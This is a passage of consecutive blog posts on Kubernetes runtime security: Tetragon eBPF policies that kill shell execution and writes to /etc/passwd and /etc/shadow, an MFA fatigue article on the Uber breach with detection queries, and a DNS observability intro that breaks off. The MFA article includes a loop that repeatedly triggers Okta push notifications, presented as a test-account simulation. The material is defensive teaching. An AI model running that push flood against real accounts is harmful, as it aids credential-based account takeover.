# Sample output:
# NAMESPACE    NAME                      AGE
# kube-system  block-privileged-exec     3d
# kube-system  restrict-sensitive-paths  3d
# See what eBPF programs Tetragon has loaded
bpftool prog list | grep -i tetragon

# Output sample:
# 89: lsm  name tetragon_lsm_bprm  tag 8f2a1c3e4d5b7a9f  gpl
#     loaded_at 2026-04-22T09:13:45+0530  uid 0
#     xlated 3312B  jited 2184B  memlock 8192B
# 91: kprobe  name tetragon_kp_exec tag 3c1d8e2f7a4b5c9d  gpl

lsm program type confirms LSM hook attachment. If you see tetragon_lsm_* entries, Tetragon is enforcing at the kernel level on this node.

Not running Tetragon? Check if your cluster uses AppArmor or seccomp profiles instead — kubectl get pod <name> -o jsonpath='{.metadata.annotations}' and look for seccomp.security.alpha.kubernetes.io or container.apparmor.security.beta.kubernetes.io annotations. These are userspace-applied profiles that the kernel enforces. Tetragon is additive — it can run alongside AppArmor/seccomp and provides per-process, dynamic policy that static profiles cannot.


Falco fired at 03:14 AM. The alert: a process inside a production container had opened /etc/passwd for writing. By the time I was on the call, the container had been restarted by a health check failure — the compromised process had already exited. The file had already been modified. Falco had detected the open, emitted the alert, and by the time any automated response could have acted, the syscall had returned, the write had completed, and the file was changed.

Falco did exactly what it’s designed to do: observe and alert. The gap isn’t in Falco — it’s in the architecture. When a tool detects from userspace by reading kernel audit events, there is always a window between the operation completing and the alert firing. For a fast exploit, that window is the entire attack.

I added a Tetragon TracingPolicy the following week:

spec:
  kprobes:
    - call: "security_inode_permission"
      syscall: false
      return: false
      args:
        - index: 0
          type: "inode"
      selectors:
        - matchArgs:
            - index: 0
              operator: "Prefix"
              values: ["/etc/passwd", "/etc/shadow"]
          matchActions:
            - action: Sigkill

Next time a process tries to open /etc/passwd for writing in a container covered by that policy, the kernel sends SIGKILL from within the LSM hook. The open never completes. There is no window.


How LSM Hooks Are Placed in the Kernel

Linux Security Modules (LSM) is a framework built into the Linux kernel that inserts hook points before security-sensitive operations. The hook fires before the operation is allowed to complete — the LSM module can return an error code that causes the kernel to reject the operation and return -EPERM to the calling process.

Process calls open("/etc/passwd", O_WRONLY)
      ↓
VFS (Virtual Filesystem) layer receives the request
      ↓
VFS calls security_inode_permission()   ← LSM hook fires here
      ↓
LSM module checks policy
      ↓
      ├── ALLOW → open() proceeds, file descriptor returned
      └── DENY  → open() returns -EPERM, process gets "Permission denied"
                  File is never touched

LSM hook — a callback point embedded in Linux kernel source at every security-sensitive operation: file open, execute, socket connect, capability check, mount, ptrace, and more. The kernel calls registered LSM modules at each hook. Before BPF LSM (kernel 5.7), only statically compiled security modules (SELinux, AppArmor, BPF LSM itself) could register at these hooks.

BPF_PROG_TYPE_LSM — the eBPF program type that attaches to LSM hooks. Introduced in kernel 5.7. Requires BPF LSM to be enabled in the kernel (lsm=bpf in kernel command line, or present alongside other LSMs). When this program type is loaded and attached to an LSM hook, the eBPF program runs at the hook point and returns 0 (allow) or a negative error code (deny).

The full list of LSM hooks:

# All LSM hook points available for eBPF attachment
bpftool feature list | grep lsm_hook | head -20

# Or browse the kernel source list:
# include/linux/security.h — every security_*() function is an LSM hook point

There are 200+ LSM hook points. The most operationally relevant for container security:

LSM Hook What it guards
security_bprm_check Process execution (execve)
security_inode_permission File read/write/execute
security_inode_create File creation
security_socket_connect Outbound TCP/UDP connect
security_socket_bind Port binding
security_ptrace_access_check ptrace (debugger attach)
security_capable Capability checks (CAP_SYS_ADMIN etc.)

How Tetragon Combines LSM and kprobe

Tetragon attaches two types of programs simultaneously for comprehensive runtime security:

kprobe programs          LSM programs
(observation layer)      (enforcement layer)
       │                        │
       ↓                        ↓
Process executes              Kernel LSM hook fires
kernel function               BEFORE operation completes
       │                        │
       ↓                        ↓
Tetragon reads context:       Tetragon checks TracingPolicy:
  - process name                - selectors match?
  - PID, UID                    - action = Sigkill?
  - namespace, pod name         │
  - parent process              ↓
  - capabilities                SIGKILL sent from kernel context
       │                        Process terminated
       ↓                        Operation never completes
Tetragon exports event
  to userspace observer

The kprobe side provides the rich context (pod name, namespace, process tree) because it has access to Kubernetes metadata that Tetragon’s userspace component has pre-populated into maps. The LSM side provides the enforcement capability. Together, they give you context-aware kernel enforcement.

SIGKILL from kernel vs userspace kill — When a userspace process runs kill -9 <pid>, it issues a kill syscall, the kernel schedules the signal delivery, and the target process dies on its next scheduler timeslice. There is a measurable delay — and more importantly, the target process may run for several more instructions before the signal is delivered. When a BPF LSM program returns a non-zero error code or calls bpf_send_signal(SIGKILL) from within the hook, the signal is delivered synchronously within the kernel’s execution context. The process does not execute another instruction in the problematic syscall. This is not a speed difference — it is a structural difference in when the enforcement happens relative to the operation.


Writing a Tetragon TracingPolicy for Enforcement

Tetragon policies are Kubernetes custom resources. Here’s a policy that prevents any container from executing shells:

apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: block-shell-exec
spec:
  kprobes:
    - call: "security_bprm_check"
      syscall: false
      args:
        - index: 0
          type: "linux_binprm"
      selectors:
        - matchBinaries:
            - operator: "In"
              values:
                - "/bin/sh"
                - "/bin/bash"
                - "/bin/dash"
                - "/usr/bin/sh"
                - "/usr/bin/bash"
          matchNamespaces:
            - namespace: Pid
              operator: "NotIn"
              values: ["1"]      # exclude host namespace (PID 1 = init)
          matchActions:
            - action: Sigkill
              argError: -1       # EPERM returned to the caller

Apply and verify:

kubectl apply -f block-shell-exec.yaml

# Confirm it's active
kubectl get tracingpolicies
# NAME               ENABLED   REASON   AGE
# block-shell-exec   true               5s

# Verify Tetragon loaded the eBPF program for this policy
bpftool prog list | grep bprm
# 94: lsm  name tetragon_lsm_bprm  tag 8f2a1c3e4d5b7a9f  gpl
#     loaded_at 2026-04-22T14:22:13+0530  uid 0

Test it (in a non-production namespace):

kubectl exec -it test-pod -- /bin/sh

# Expected output:
# OCI runtime exec failed: exec failed: unable to start container process:
# error during container init: error starting executable ["/bin/sh"]:
# container_linux.go: ... starting container process caused: process_linux.go:
# ... SIGKILL

The shell never started. The security_bprm_check LSM hook fired, the Tetragon eBPF program evaluated the policy, returned SIGKILL from kernel space. The exec system call returned -EPERM to the container runtime. No shell process was created.


Audit Mode Before Enforce Mode

Running a new LSM policy in enforce mode without prior testing will kill legitimate workloads. Tetragon supports audit mode for every policy:

          matchActions:
            - action: Post     # audit mode: log event, do NOT kill

Post emits a Tetragon event that you can observe:

# Watch audit events for the policy (before switching to Sigkill)
kubectl exec -n kube-system -it \
  $(kubectl get pod -n kube-system -l app.kubernetes.io/name=tetragon -o name | head -1) \
  -- tetra getevents --event-types PROCESS_KPROBE | grep bprm

Sample audit event:

{
  "process_kprobe": {
    "process": {
      "pod": {"name": "my-app-6d4f9-xk2p1", "namespace": "production"},
      "binary": "/bin/sh",
      "pid": 18293
    },
    "function_name": "security_bprm_check",
    "action": "KPROBE_ACTION_POST"
  }
}

If my-app legitimately needs /bin/sh for its health check script, you’ll see it here before you kill it. Refine the selector (add matchLabels to exclude that specific deployment, or add the binary to an allowlist) and then switch to Sigkill.


⚠ Production Gotchas

Enforce mode kills anything the selector matches — including health checks and init containers. Most production containers have some shell usage: liveness probes that run sh -c, init containers that chmod files, entrypoint wrappers. Run in Post (audit) mode for at least 48 hours across a representative workload set before switching to Sigkill. Track all matched events and understand every process in the trace before enforcing.

LSM hooks fire in kernel context — eBPF program complexity is limited. The verifier enforces strict limits on LSM programs because they run synchronously in the kernel’s hot path. Policies with many conditions or complex map lookups may be rejected by the verifier. Tetragon’s policy engine compiles your TracingPolicy into eBPF that stays within verifier limits, but very complex matchArgs chains with many values can hit limits. Test with kubectl apply and check Tetragon pod logs for verifier rejection messages.

BPF_PROG_TYPE_LSM requires kernel 5.7+ and BPF LSM enabled. Check /sys/kernel/security/lsm for bpf in the list. EKS nodes running Amazon Linux 2 with kernel 5.10+ have BPF LSM available. GKE nodes with kernel 5.10+ on Container-Optimized OS have it enabled. Ubuntu 22.04 (kernel 5.15) has it enabled by default. Ubuntu 20.04 kernels before 5.7 do not — check your actual kernel version.

Policy scope: Tetragon TracingPolicies are cluster-wide by default. A policy without a matchNamespaces or matchLabels selector applies to every pod on every node. Start with namespace-scoped policies during testing. Use namespaced TracingPolicy resources (Tetragon 0.10+) to limit scope to a specific namespace.

bpf_send_signal(SIGKILL) vs returning an error code. Tetragon’s Sigkill action uses bpf_send_signal() rather than returning a negative error from the LSM hook. This means the syscall may return before the signal is delivered — there can be a single instruction window. For critical enforcement paths, combining LSM deny (return -EPERM) with bpf_send_signal(SIGKILL) is the belt-and-suspenders approach; Tetragon’s maintainers have documented which actions use which mechanism.


Quick Reference

What you want Command
Is BPF LSM enabled? cat /sys/kernel/security/lsm (look for bpf)
What LSM programs are loaded? bpftool prog list | grep lsm
What Tetragon policies exist? kubectl get tracingpolicies -A
Audit events (before enforce) tetra getevents --event-types PROCESS_KPROBE
Watch Tetragon enforcement kubectl logs -n kube-system -l app.kubernetes.io/name=tetragon -f
Test a policy safely Set action: Post before action: Sigkill
Tetragon action Effect
Post Log event only — audit mode
Sigkill Send SIGKILL from kernel context
Override Return custom error code to syscall caller
FollowFD Track file descriptor for future hook correlation
LSM hook Protects
security_bprm_check exec (block shell spawning)
security_inode_permission file access (block reads/writes to sensitive paths)
security_socket_connect outbound connections (block C2 connections)
security_capable capability escalation (block CAP_SYS_ADMIN attempts)

Key Takeaways

  • LSM eBPF Tetragon enforces at the syscall boundary — the operation either never completes or returns an error before the kernel performs the action, with no detect-and-respond window
  • Falco, Datadog, and sidecar-based tools detect events after the syscall returns; this is architectural, not a product limitation — they operate at a layer where the operation has already occurred
  • BPF_PROG_TYPE_LSM attaches eBPF programs directly to Linux Security Module hooks; available on kernel 5.7+, enabled on all current EKS/GKE LTS node images
  • Tetragon sends SIGKILL from kernel context using bpf_send_signal() — not from a userspace agent polling an audit log
  • Always run Tetragon policies in Post (audit) mode for 48+ hours before switching to Sigkill — legitimate workloads trigger many of the same LSM hooks that attacks use
  • The combination of kprobe (rich context: pod name, namespace, process tree) and LSM (enforcement) gives Tetragon context-aware kernel enforcement that static profiles (AppArmor, seccomp) cannot provide dynamically

What’s Next

LSM hooks prevent operations in the moment. But after an incident — when enforcement failed, or when you’re doing post-hoc forensics — the question changes: what did this process spawn, what files did it touch, what connections did it make, and in what order? Answering that from logs alone is guesswork. Answering it from kernel-level process lineage is reconstruction.

EP13 covers how eBPF kprobe hooks on fork and exec build a complete, tamper-resistant process tree. Even after the attacker’s process has exited, the record remains — in kernel maps, exported to a persistent store, tied to the pod that ran it.

Next: process lineage with eBPF — reconstructing what happened after the fact

Get EP13 in your inbox when it publishes → linuxcent.com/subscribe

MFA Fatigue Attacks: How Uber Got Breached and How to Stop It

Reading Time: 10 minutes

What is purple team securityOWASP Top 10 mapped to cloud infrastructureCloud security breaches 2020–2025Broken access control in AWSMFA fatigue attacks


TL;DR

  • An MFA fatigue attack exploits push-notification MFA (Duo, Okta Verify, Microsoft Authenticator) by flooding a user with push requests until they accept one — either out of exhaustion or after social engineering
  • Uber (September 2022): contractor credentials purchased on a criminal marketplace → repeated Duo push notifications → WhatsApp social engineering → push accepted → admin PAM credentials found on internal file share → full access to AWS, GCP, Slack, HackerOne
  • The attack works because push MFA creates a UX habit: “tap accept” is a trained response, not a decision
  • Detection: multiple MFA failures followed by a single success in a short window — Okta System Log, Azure AD Sign-in Log, AWS CloudTrail
  • The structural fix is replacing push MFA with phishing-resistant FIDO2 hardware keys — not security awareness training, not more push notifications, not “number matching” alone
  • Okta (October 2023): support system breach exposed session tokens → attackers bypassed MFA entirely by using stolen session context

OWASP Mapping: A07 Identification and Authentication Failures. The Uber breach is the defining infrastructure example. Okta demonstrates session token theft as a related A07 variant.


The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│                    MFA FATIGUE ATTACK ANATOMY                       │
│                                                                     │
│   STEP 1: OBTAIN CREDENTIALS                                        │
│   Attacker ──── phish / buy on market ──────▶ username + password  │
│                                                                     │
│   STEP 2: TRIGGER MFA FLOOD                                         │
│   Attacker ──── repeated login attempts ────▶ Push #1 → User: NO   │
│                                               Push #2 → User: NO   │
│                                               Push #3 → User: NO   │
│                                               Push #4 → User: ???   │
│                                                                     │
│   STEP 3: SOCIAL ENGINEERING LAYER                                  │
│   Attacker ──── "Hi, I'm from IT support.                           │
│                  Please accept the next push."                      │
│                                               Push #4 → User: YES  │
│                                                                     │
│   STEP 4: ACCESS                                                    │
│   Attacker ──── authenticated session ──────▶ Internal network      │
│                                               Enumerate shares      │
│                                               Find next credential  │
│                                                                     │
│   ═══════════════════════════════════════════════════════           │
│   WHY TRAINING DOESN'T HELP:                                        │
│   Push MFA trains users to tap accept. The attacker exploits        │
│   the trained behavior. Education competes with habit.              │
│                                                                     │
│   WHY HARDWARE KEYS DO:                                             │
│   FIDO2 requires physical presence. WhatsApp message                │
│   cannot accept a hardware key challenge.                           │
└─────────────────────────────────────────────────────────────────────┘

An MFA fatigue attack is how you bypass multi-factor authentication without breaking encryption or stealing the MFA seed — you exploit the user’s psychology and the UX of push-notification systems. The attacker knows the password. The only thing standing between them and access is the user’s willingness to tap “deny” indefinitely.


The Uber Breach: Anatomy Minute by Minute

September 15, 2022. The attacker’s capabilities: a purchased credential set for an Uber contractor account, a phone number, and patience.

The credential acquisition: Uber contractor credentials were available on criminal marketplaces. The attacker obtained a valid username and password for an Uber contractor’s Uber corporate account.

The MFA flood:

The contractor’s account had Duo push-based MFA enrolled. The attacker initiated login attempts repeatedly, triggering a sequence of Duo push notifications to the contractor’s phone. The contractor rejected three or four of them. At this point, most attacks would stop — but the attacker added a social engineering layer.

The WhatsApp message:

The attacker sent a WhatsApp message to the contractor’s number, claiming to be from Uber IT support:

“Hi, this is the Uber IT support team. We’re seeing some issues with your account and need you to approve the next Duo notification to verify your identity.”

The contractor accepted the next push notification.

Post-authentication enumeration:

With an authenticated session, the attacker accessed Uber’s internal network. On an internal network share accessible to contractors, they found a PowerShell script. In that script: hardcoded Thycotic admin credentials. Thycotic is a Privileged Access Management (PAM) system — it stores credentials for privileged accounts across an organization.

The blast radius:

With Thycotic admin access, the attacker retrieved credentials for:
– AWS IAM accounts
– GCP service accounts
– Google Workspace admin
– VMware vSphere
– Slack workspace admin
– HackerOne bug bounty program admin (including details of open security reports)

The entire Uber infrastructure was accessible from one contractor’s push notification acceptance.

What Uber’s logs showed:

2022-09-15T02:17:00Z  [Duo] [email protected]  action=push_sent  result=rejected
2022-09-15T02:17:45Z  [Duo] [email protected]  action=push_sent  result=rejected
2022-09-15T02:18:30Z  [Duo] [email protected]  action=push_sent  result=rejected
2022-09-15T02:19:15Z  [Duo] [email protected]  action=push_sent  result=rejected
2022-09-15T02:22:00Z  [Duo] [email protected]  action=push_sent  result=approved
2022-09-15T02:22:05Z  [VPN] [email protected]  connection=established  ip=<attacker>

Four rejections followed by one approval in a five-minute window. This is a detectable pattern — but only if someone is looking for it.


Red Phase: Simulating MFA Fatigue

What the Attack Looks Like in Tooling

MFA fatigue attacks are conducted manually — an attacker with valid credentials and knowledge of which MFA system the target uses. No special tooling is required for the attack itself. What can be simulated:

Option 1: Repeated legitimate login attempts (test account only)

# DO NOT run against production accounts or accounts you don't own

# Using Okta API to authenticate (test environment only)
TEST_USERNAME="[email protected]"
TEST_PASSWORD="TestPassword123!"
OKTA_DOMAIN="your-org.okta.com"

for i in {1..5}; do
  echo "Attempt $i at $(date +%T)"
  response=$(curl -s -X POST \
    "https://${OKTA_DOMAIN}/api/v1/authn" \
    -H "Content-Type: application/json" \
    -d "{\"username\": \"${TEST_USERNAME}\", \"password\": \"${TEST_PASSWORD}\"}")

  status=$(echo "$response" | jq -r '.status')
  echo "  Status: $status"

  if [ "$status" = "MFA_CHALLENGE" ]; then
    state_token=$(echo "$response" | jq -r '.stateToken')
    factor_id=$(echo "$response" | jq -r '._embedded.factors[] | select(.factorType == "push") | .id')
    echo "  Factor ID: $factor_id (push notification triggered)"

    # In a real attack, the attacker would poll for the MFA response:
    echo "  Waiting 10 seconds for user to respond..."
    sleep 10
  fi

  sleep 30  # Wait between attempts to avoid rate limiting
done

Option 2: Tabletop exercise (no credentials required)

For organizations that cannot run live credential tests, the tabletop simulation maps the attack against your specific IdP logs. Pull 30 days of authentication logs and look for the pattern:

# Okta System Log: find users with multiple MFA failures followed by success
curl -H "Authorization: SSWS ${OKTA_API_TOKEN}" \
  "https://your-org.okta.com/api/v1/logs?filter=eventType+eq+\"user.authentication.auth_via_mfa\"&limit=1000" | \
  jq '
    group_by(.actor.id) |
    map({
      user: .[0].actor.displayName,
      total: length,
      failures: [.[] | select(.outcome.result == "FAILURE")] | length,
      successes: [.[] | select(.outcome.result == "SUCCESS")] | length
    }) |
    sort_by(.failures) |
    reverse |
    .[0:20]
  '

Users with high failure counts followed by eventual success are the fatigue attack pattern. Some will be legitimate (user locked themselves out, then called IT). The ones to investigate are those where the failure-to-success sequence happened in a short window (under 30 minutes) and from an unusual IP.


Blue Phase: Detection Across Identity Providers

Okta: Push Notification Flood

# Okta System Log — detect repeated push failures from same user
# Query for: >3 push failures within 10 minutes for same user
curl -H "Authorization: SSWS ${OKTA_API_TOKEN}" \
  "https://your-org.okta.com/api/v1/logs?filter=eventType+eq+\"user.authentication.auth_via_mfa\"+and+outcome.result+eq+\"FAILURE\"&since=$(date -u -d '24 hours ago' +%Y-%m-%dT%H:%M:%SZ)" | \
  jq '
    group_by(.actor.id, (.published[0:16])) |
    map(select(length >= 3)) |
    map({
      user: .[0].actor.displayName,
      window: .[0].published[0:16],
      failure_count: length,
      ips: [.[].client.ipAddress] | unique
    })
  '

Azure AD: Conditional Access Logs

# Azure AD: MFA push denial flood detection (using Azure CLI)
az monitor activity-log list \
  --start-time "$(date -u -d '24 hours ago' +%Y-%m-%dT%H:%M:%SZ)" \
  --query "[?contains(operationName.value, 'MFA')].{user:caller,time:eventTimestamp,result:status.value}" \
  --output table

In Microsoft Sentinel, the detection rule for MFA fatigue:

// Azure AD MFA Fatigue Detection — Sentinel KQL
SigninLogs
| where TimeGenerated > ago(24h)
| where AuthenticationRequirement == "multiFactorAuthentication"
| where ResultType != "0"  // Non-success
| summarize
    FailureCount = count(),
    SuccessCount = countif(ResultType == "0"),
    IPs = make_set(IPAddress),
    StartTime = min(TimeGenerated),
    EndTime = max(TimeGenerated)
    by UserPrincipalName, bin(TimeGenerated, 10m)
| where FailureCount >= 3
| where SuccessCount >= 1
| where datetime_diff('minute', EndTime, StartTime) <= 30
| project UserPrincipalName, FailureCount, SuccessCount, IPs, StartTime, EndTime
| order by FailureCount desc

AWS CloudTrail: Console Session After MFA Flood

If your organization uses AWS SSO (IAM Identity Center) with an external IdP, the CloudTrail event that matters is the console login event immediately following the MFA success:

# Find AWS console login events from unusual IPs
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=ConsoleLogin \
  --start-time "$(date -d '24 hours ago' --iso-8601=seconds)" \
  --query 'Events[].{Time:EventTime,User:Username,IP:CloudTrailEvent}' \
  --output json | \
  jq '.[] | {
    time: .Time,
    user: .User,
    ip: (.IP | fromjson | .sourceIPAddress),
    mfa: (.IP | fromjson | .additionalEventData.MFAUsed)
  }'

What a GuardDuty Alert Looks Like for This Attack

GuardDuty does not generate a specific finding for MFA fatigue (it does not have visibility into IdP logs). What it may catch downstream:

  • UnauthorizedAccess:IAMUser/ConsoleLoginSuccess.B — console login from unusual geographic location or Tor exit node
  • Discovery:IAMUser/AnomalousBehavior — if the attacker begins enumerating IAM after console access

The gap: GuardDuty’s behavioral analysis is per-account. If the attacker logs in using valid credentials and MFA, GuardDuty may not flag the initial access — only downstream actions that deviate from baseline.


Purple Phase: The Structural Fix

Fix 1: Replace Push MFA with FIDO2 Hardware Keys (for Tier-0 Accounts)

This is the only structural fix. MFA fatigue attacks work because push notifications can be approved by a human who is socially engineered. FIDO2 hardware keys (YubiKey, Google Titan, etc.) require physical possession of the key and a user gesture (touch). A WhatsApp message cannot substitute for physical key presence.

# Okta: Require hardware key MFA for admin accounts
# (done via Okta Admin Console → Security → Authentication Policies)
# CLI example using Okta API:

# Create a new authentication policy requiring hardware authenticator
curl -X POST \
  "https://your-org.okta.com/api/v1/policies" \
  -H "Authorization: SSWS ${OKTA_API_TOKEN}" \
  -H "Content-Type: application/json" \
  -d '{
    "name": "Admin Hardware Key Policy",
    "type": "ACCESS_POLICY",
    "status": "ACTIVE",
    "description": "Requires FIDO2 hardware key for admin access"
  }'

Phasing hardware keys across an organization:

Tier Examples Timeline
Tier 0 — immediate Cloud admin, IAM admin, Okta admin, DNS admin Week 1
Tier 1 — 30 days All engineers with production access Month 1
Tier 2 — 90 days All employees with SSO access Month 3
Contractors Scope-limited access, enforce at boundary Immediate

Fix 2: Number Matching (Intermediate Mitigation)

If hardware keys cannot be deployed immediately, number matching significantly reduces MFA fatigue effectiveness. Instead of a simple “approve/deny” push, the user must match a number shown on the login screen to a number shown in the authenticator app. This breaks the fatigue pattern — the attacker cannot trigger an approval without the user actively entering the correct number.

# Duo: Enable number matching
# Duo Admin Console → Policies → Duo Push Number Matching: Required

# Microsoft Authenticator: Enable number matching
# Azure AD → Security → Authentication methods → Microsoft Authenticator
# Enable: "Require number matching for push notifications"

# Okta Verify: Enable TOTP-bound push
# Okta Admin → Security → Multifactor → Okta Verify → Enable "Number Challenge"

Fix 3: Detect and Block — Automated Response to Fatigue Pattern

#!/usr/bin/env python3
# Purple Team EP05 — MFA Fatigue Auto-Response
# Monitors Okta System Log; suspends user on fatigue pattern detection
# Run as a Lambda function or scheduled script in your SIEM pipeline

import boto3
import requests
import json
from datetime import datetime, timedelta

OKTA_DOMAIN = "your-org.okta.com"
OKTA_TOKEN = "your-okta-api-token"  # use Secrets Manager in production
SNS_TOPIC_ARN = "arn:aws:sns:us-east-1:123456789012:security-alerts"

def get_recent_mfa_events(hours=1):
    since = (datetime.utcnow() - timedelta(hours=hours)).strftime("%Y-%m-%dT%H:%M:%SZ")
    url = f"https://{OKTA_DOMAIN}/api/v1/logs"
    params = {
        "filter": 'eventType eq "user.authentication.auth_via_mfa"',
        "since": since,
        "limit": 1000
    }
    headers = {"Authorization": f"SSWS {OKTA_TOKEN}"}
    response = requests.get(url, params=params, headers=headers)
    return response.json()

def detect_fatigue_pattern(events, failure_threshold=3, window_minutes=10):
    user_events = {}
    for event in events:
        user_id = event["actor"]["id"]
        user_name = event["actor"]["displayName"]
        result = event["outcome"]["result"]
        timestamp = event["published"]

        if user_id not in user_events:
            user_events[user_id] = {"name": user_name, "events": []}
        user_events[user_id]["events"].append({"result": result, "time": timestamp})

    fatigue_users = []
    for user_id, data in user_events.items():
        events_sorted = sorted(data["events"], key=lambda x: x["time"])
        failures = [e for e in events_sorted if e["result"] == "FAILURE"]

        if len(failures) >= failure_threshold:
            # Check if a success followed the failures
            last_failure_time = failures[-1]["time"]
            successes_after = [
                e for e in events_sorted
                if e["result"] == "SUCCESS" and e["time"] > last_failure_time
            ]
            if successes_after:
                fatigue_users.append({
                    "user_id": user_id,
                    "user_name": data["name"],
                    "failure_count": len(failures),
                    "success_after_failures": True
                })

    return fatigue_users

def alert_security_team(fatigue_users):
    sns = boto3.client("sns")
    message = f"MFA FATIGUE ALERT — {len(fatigue_users)} user(s) detected:\n"
    for user in fatigue_users:
        message += f"  - {user['user_name']}: {user['failure_count']} failures then success\n"

    sns.publish(
        TopicArn=SNS_TOPIC_ARN,
        Subject="Purple Team: MFA Fatigue Attack Detected",
        Message=message
    )

def lambda_handler(event, context):
    events = get_recent_mfa_events(hours=1)
    fatigue_users = detect_fatigue_pattern(events)
    if fatigue_users:
        alert_security_team(fatigue_users)
    return {"fatigue_users_detected": len(fatigue_users)}

Fix 4: Privileged Access Workstations and Session Recording

The Uber breach succeeded because the attacker found hardcoded credentials on a file share accessible to contractors. The downstream fix after identity:

# Ensure no scripts or configuration files contain credentials
# Run TruffleHog against your internal repositories and file shares
trufflehog filesystem /path/to/internal/share \
  --json \
  --include-detectors=all \
  2>/dev/null | \
  jq '{file: .SourceMetadata.Data.Filesystem.file, detector: .DetectorName, verified: .Verified}'

Run This in Your Own Environment: MFA Audit

#!/bin/bash
# Purple Team EP05 — MFA Coverage Audit
# Checks for push-MFA users who are A07 exposure without hardware key enrollment

echo "=== AWS: Console Users Without MFA ==="
aws iam generate-credential-report > /dev/null 2>&1
sleep 5
aws iam get-credential-report --query 'Content' --output text | base64 -d | \
  awk -F',' 'NR>1 && $4=="true" && $8=="false" {
    print "  USER: " $1 " | Console: " $4 " | MFA: " $8
  }'

echo ""
echo "=== AWS: IAM Users with Long-Lived Access Keys (rotation risk) ==="
aws iam get-credential-report --query 'Content' --output text | base64 -d | \
  awk -F',' 'NR>1 && $9!="N/A" {
    cmd = "date -d " $10 " +%s"
    cmd | getline key_date; close(cmd)
    now = systime()
    age_days = int((now - key_date) / 86400)
    if (age_days > 90) print "  USER: " $1 " | KEY AGE: " age_days " days"
  }'

echo ""
echo "=== RECOMMENDATION ==="
echo "  - Any console user without MFA = immediate A07 exposure"
echo "  - For accounts with Okta/Azure AD: run IdP-specific audit above"
echo "  - Hardware FIDO2 keys required for all admin accounts"

⚠ Common Mistakes When Responding to MFA Fatigue Risk

Mandating security training as the primary response. The Uber contractor was experienced. Training did not fail — the attacker exploited a social engineering vector that training cannot structurally prevent. Hardware keys remove the social engineering surface entirely.

Implementing “number matching” and considering MFA fatigue solved. Number matching makes fatigue attacks harder, not impossible. A sophisticated attacker can relay the number in real time via voice call (“what number do you see on your screen?”). It buys time; it does not eliminate the attack class.

Requiring MFA for employees but not contractors. The Uber breach was a contractor account. Contractor access policies tend to have looser MFA requirements because contractors often resist corporate MDM on personal devices. The solution is to scope contractor access tightly and require hardware key MFA at the access boundary, not push MFA.

Not monitoring for the failure-then-success pattern. The Okta System Log, Azure AD Sign-in Logs, and Duo Admin Panel all have the data to detect MFA fatigue in real time. Most organizations generate these logs but do not have detection rules for the pattern. The detection is straightforward; the investment is adding the rule to your SIEM.

Forgetting session tokens. The Okta breach was not MFA fatigue — it was session token theft. An attacker who can steal a valid session token does not need to beat MFA at all. Session token lifetime, storage security, and re-authentication requirements for sensitive operations are separate controls that address this variant.


Quick Reference

Attack Variant Mechanism Structural Fix
Push notification flood Attacker initiates logins repeatedly until user accepts FIDO2 hardware key MFA
Social engineering layer Attacker contacts user claiming to be IT support Hardware key (physical presence required)
Session token theft Steal valid session without needing MFA at all Short session lifetime + re-auth for sensitive ops
Number matching bypass Relay number via voice call in real time Hardware key (no relay possible)
SIM swap Port victim’s phone number to attacker’s SIM; receive OTP Hardware key (phone-independent)

Key Takeaways

  • An MFA fatigue attack exploits push notification UX — training users to tap “deny” competes with a trained habit of tapping “accept”; hardware keys eliminate the attack surface by requiring physical presence
  • The Uber breach (2022) was MFA fatigue + hardcoded credentials in a file share — two OWASP categories chained (A07 + A02)
  • Detection is straightforward: multiple MFA failures followed by a success in a short window — this pattern exists in every IdP’s logs; adding the detection rule is the work
  • Number matching is a meaningful intermediate mitigation; it is not a structural fix
  • Hardware FIDO2 keys are the structural fix — they require physical presence and are phishing-resistant by design
  • Tier-0 accounts (cloud admin, IAM admin, Okta admin) cannot wait for the phased rollout — hardware keys on day one
  • Session token theft (CircleCI, Okta support breach) is a related A07 variant: even perfect MFA is bypassed if a valid session token is exfiltrated

What’s Next

EP06 covers CI/CD secrets exposure — how pipeline breaches work, why storing credentials in environment variables is structurally dangerous, and how the CircleCI breach exposed secrets that teams thought were safely stored. The structural answer is OIDC workload identity (IAM EP07): short-lived credentials that cannot be exfiltrated because they don’t exist until the moment they’re needed.

Get EP06 in your inbox when it publishes → subscribe at linuxcent.com

DNS at the Kernel Level — What Your Pods Are Actually Resolving

Reading Time: 9 minutes

eBPF: From Kernel to Cloud, Episode 11
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps · CO-RE and libbpf · XDP · TC eBPF · bpftrace · Network Flow Observability · DNS Observability


Architecture Overview

eBPF DNS Kernel Observability — kernel-level DNS event capture without touching application code
eBPF intercepts DNS at the kernel socket layer — capturing query, response, and latency without application changes.

TL;DR

  • DNS observability in Kubernetes with eBPF hooks the kernel’s DNS syscall path — giving you per-pod query visibility without sidecars, restarts, or CoreDNS log scraping
    (tracepoint = a stable, versioned hook placed deliberately in the Linux kernel source; unlike kprobes, tracepoints survive kernel upgrades without breakage)
  • CoreDNS metrics tell you aggregate query rates; eBPF tracepoints tell you which pod queried what domain, when, and what was returned
  • A compromised workload’s first observable action is almost always an unexpected DNS query — infrastructure no legitimate process should ever resolve
  • The DNS syscall path in Linux goes: application calls getaddrinfo() → glibc → sendto() syscall → kernel network stack → UDP packet to CoreDNS resolver
  • You hook the sendto tracepoint to catch the query leaving the pod and the recvfrom tracepoint to catch the response arriving
  • Production note: DNS query payloads cross the kernel as raw UDP — parsing the DNS wire format in a bpftrace one-liner requires reading past the UDP header; Tetragon and Pixie do this parsing in the eBPF program itself

EP10 showed eBPF flow telemetry as the ground truth for what connections your pods are making. DNS observability with eBPF goes one layer beneath that: the name resolution step that happens before any connection is established. Every domain a pod resolves is visible at the kernel level. That visibility is what a security scan alert is missing when it flags “unexpected DNS queries” — it can see the traffic on the wire, but it can’t tell you which pod sent it without restarting or deploying an agent into the pod.

Quick Check: What DNS Traffic Is Leaving Your Pods Right Now?

Without installing anything, you can see DNS queries crossing any node in under 30 seconds:

# SSH into a worker node, then:

# Watch all UDP port 53 traffic — which processes are making DNS queries?
bpftrace -e '
tracepoint:syscalls:sys_enter_sendto {
    $port = (uint16)((uint8*)args->addr)[3] << 8 |
            (uint16)((uint8*)args->addr)[2];
    if ($port == 53) {
        printf("%-20s %-6d DNS query (UDP sendto)\n", comm, pid);
    }
}' --timeout 30

Expected output:

